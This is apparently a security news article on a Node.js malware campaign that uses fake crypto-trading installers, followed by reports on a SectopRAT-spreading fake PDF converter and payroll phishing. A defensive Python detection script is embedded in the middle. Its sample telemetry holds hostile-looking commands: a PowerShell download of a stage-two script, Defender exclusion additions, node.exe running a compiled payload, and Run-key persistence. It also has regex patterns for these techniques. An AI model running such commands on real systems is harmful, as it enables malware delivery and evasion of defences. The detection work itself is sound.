Node.js Malware Campaign Targets Crypto Users with Fake Binance and TradingView Installers

Apr 17, 2025 | Ravie Lakshmanan | Cybersecurity / Malware

Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data exfiltration.

The activity, first detected in October 2024, uses lures related to cryptocurrency trading to trick users into installing a rogue installer from fraudulent websites that masquerade as legitimate software like Binance or TradingView.

The downloaded installer comes embedded with a dynamic-link library (“CustomActions.dll”) that’s responsible for harvesting basic system information using Windows Management Instrumentation (WMI) and setting up persistence on the host via a scheduled task.

In an attempt to keep up the ruse, the DLL launches a browser window via “msedge_proxy.exe” that displays the legitimate cryptocurrency trading website. It’s worth noting that “msedge_proxy.exe” can be used to display any website as a web application.


The scheduled task, meanwhile, is configured to run PowerShell commands that download additional scripts from a remote server. These scripts exclude the running PowerShell process and the current directory from scanning by Microsoft Defender for Endpoint as a way to sidestep detection.

Once the exclusions are set, an obfuscated PowerShell command is run to fetch and execute scripts from remote URLs that gather extensive information about the operating system, BIOS, hardware, and installed applications.

All the captured data is converted into JSON format and sent to the command-and-control (C2) server using an HTTPS POST request.

The attack chain then proceeds to the next phase, where another PowerShell script is launched to download an archive file from the C2 that contains the Node.js runtime binary and a JavaScript compiled (JSC) file. The Node.js executable kick-starts the execution of the JSC file, which goes on to establish network connections and likely siphon sensitive browser information.

[Figure: Node.js malware campaign attack chain]

In an alternate infection sequence observed by Microsoft, the ClickFix strategy has been employed to enable inline JavaScript execution, using a malicious PowerShell command to download the Node.js binary and use it to run JavaScript code directly, instead of from a file.

The inline JavaScript carries out network discovery activities to identify high-value assets, disguises the C2 traffic as legitimate Cloudflare activity to fly under the radar, and gains persistence by modifying Windows Registry run keys.
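The two infection sequences described above share a handful of host-level signals a defender can hunt for: PowerShell spawned by the Task Scheduler that downloads content, `Add-MpPreference` calls that carve out Defender exclusions, `node.exe` executing inline JavaScript (`-e`/`--eval`) or a compiled script file, and a Run key pointing back at the Node.js binary. The script below is an added example written for this article, not code from Microsoft's report or from the campaign. It runs a few simple rules over constructed endpoint telemetry; the JSON field names (`image`, `parent_cmdline`, `key`, `data`, and so on) are an assumed schema rather than any vendor's format, and the `.jsc` extension used for the compiled script is an assumption based on the article's description.

```python
import json
import re

# Constructed sample telemetry (not real campaign data). One JSON record per line,
# loosely modelled on process-creation and registry-value-set events. The field
# names are an assumption of this example, not a vendor schema. Lines 6 and 7 are
# benign controls that the rules should not flag.
SAMPLE_EVENTS = r"""
{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\svchost.exe","parent_cmdline":"svchost.exe -k netsvcs -p -s Schedule","cmdline":"powershell.exe -NoProfile -Command Invoke-WebRequest https://example.invalid/stage2.ps1 -OutFile $env:TEMP\\s2.ps1"}
{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_cmdline":"powershell.exe -NoProfile","cmdline":"powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath $PWD -ExclusionProcess powershell.exe"}
{"type":"process","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\node.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_cmdline":"powershell.exe -NoProfile","cmdline":"node.exe -e \"require('net')\""}
{"type":"process","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\node.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_cmdline":"powershell.exe -NoProfile","cmdline":"node.exe C:\\Users\\alice\\AppData\\Local\\Temp\\payload.jsc"}
{"type":"registry","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\node.exe","key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","value":"Updater","data":"C:\\Users\\alice\\AppData\\Local\\Temp\\node.exe C:\\Users\\alice\\AppData\\Local\\Temp\\payload.jsc"}
{"type":"process","image":"C:\\Program Files\\nodejs\\node.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","parent_cmdline":"cmd.exe","cmdline":"node.exe C:\\dev\\app\\server.js"}
{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","parent_cmdline":"explorer.exe","cmdline":"powershell.exe Get-MpPreference"}
"""

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Add-MpPreference with any -Exclusion* parameter (real Defender cmdlet/parameters).
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)", re.I)
# Task Scheduler hosts tasks in the "Schedule" svchost service group.
SCHEDULE_PARENT = re.compile(r"-s\s+Schedule\b", re.I)
DOWNLOAD_CUE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I)
# node -e / --eval / -p / --print run JavaScript passed on the command line, not from a file.
NODE_INLINE = re.compile(r"(?:^|\s)(?:-e|--eval|-p|--print)(?:\s|$)")
JSC_ARG = re.compile(r"\S+\.jsc\b", re.I)  # assumed extension for the compiled script
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?(?:\\|$)", re.I)
AUTORUN_TARGET = re.compile(r"node\.exe|powershell\.exe|pwsh\.exe", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_process(ev):
    """Return the rule names a single process-creation event triggers."""
    hits = []
    image = basename(ev.get("image", ""))
    cmd = ev.get("cmdline", "")
    parent_cmd = ev.get("parent_cmdline", "")
    if image in POWERSHELL_IMAGES:
        if DEFENDER_EXCLUSION.search(cmd):
            hits.append("defender_exclusion_added")
        if SCHEDULE_PARENT.search(parent_cmd) and DOWNLOAD_CUE.search(cmd):
            hits.append("scheduled_task_powershell_download")
    if image == "node.exe":
        if NODE_INLINE.search(cmd):
            hits.append("node_inline_eval")
        if JSC_ARG.search(cmd):
            hits.append("node_compiled_script")
    return hits


def match_registry(ev):
    """Flag Run/RunOnce values whose data launches Node.js or PowerShell."""
    if RUN_KEY.search(ev.get("key", "")) and AUTORUN_TARGET.search(ev.get("data", "")):
        return ["run_key_persistence"]
    return []


def scan(jsonl_text):
    """Run every rule over JSON-lines telemetry; returns [(line_no, rule), ...]."""
    findings = []
    for line_no, line in enumerate(jsonl_text.strip().splitlines(), 1):
        if not line.strip():
            continue
        ev = json.loads(line)
        hits = match_process(ev) if ev.get("type") == "process" else match_registry(ev)
        findings.extend((line_no, rule) for rule in hits)
    return findings


if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE_EVENTS):
        print(f"line {line_no}: {rule}")
```

Each rule on its own is noisy in a developer-heavy environment (developers legitimately run `node -e`, and administrators legitimately add Defender exclusions), so in practice these findings are most useful when correlated on one host within a short window: a scheduled-task-spawned PowerShell download followed by an exclusion, then `node.exe` appearing under a user-writable directory, is the sequence the article describes.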

“Node.js is an open-source, cross-platform JavaScript runtime environment that allows JavaScript code to run outside of a web browser,” the tech giant said. “It’s widely used and trusted by developers because it lets them build frontend and backend applications.”

“However, threat actors are also leveraging these Node.js characteristics to try to blend malware with legitimate applications, bypass conventional security controls, and persist in target environments.”

The disclosure comes as CloudSEK revealed that a fake PDF-to-DOCX converter site impersonating PDF Candy (candyxpdf[.]com or candyconverterpdf[.]com) has been found leveraging the ClickFix social engineering trick to coax victims into running encoded PowerShell commands that ultimately deploy SectopRAT (aka ArechClient2) malware.

“The threat actors meticulously replicated the user interface of the genuine platform and registered similar-looking domain names to deceive users,” security researcher Varun Ajmera said in a report published this week.


“The attack vector involves tricking victims into executing a PowerShell command that installs Arechclient2 malware, a variant of the dangerous SectopRAT information stealer family known for harvesting sensitive data from compromised systems.”

Phishing campaigns have also been observed using a PHP-based kit to target companies’ employees with human resources (HR)-themed scams to gain unauthorized access to payroll portals and change victims’ bank account information to redirect funds to an account under the threat actor’s control.

Some of these activities have been attributed to a hacking group called Payroll Pirates. The attackers use malicious search advertising campaigns on Google, with sponsored phishing websites and spoofed HR pages, to lure unsuspecting victims into providing their credentials and two-factor authentication (2FA) codes.
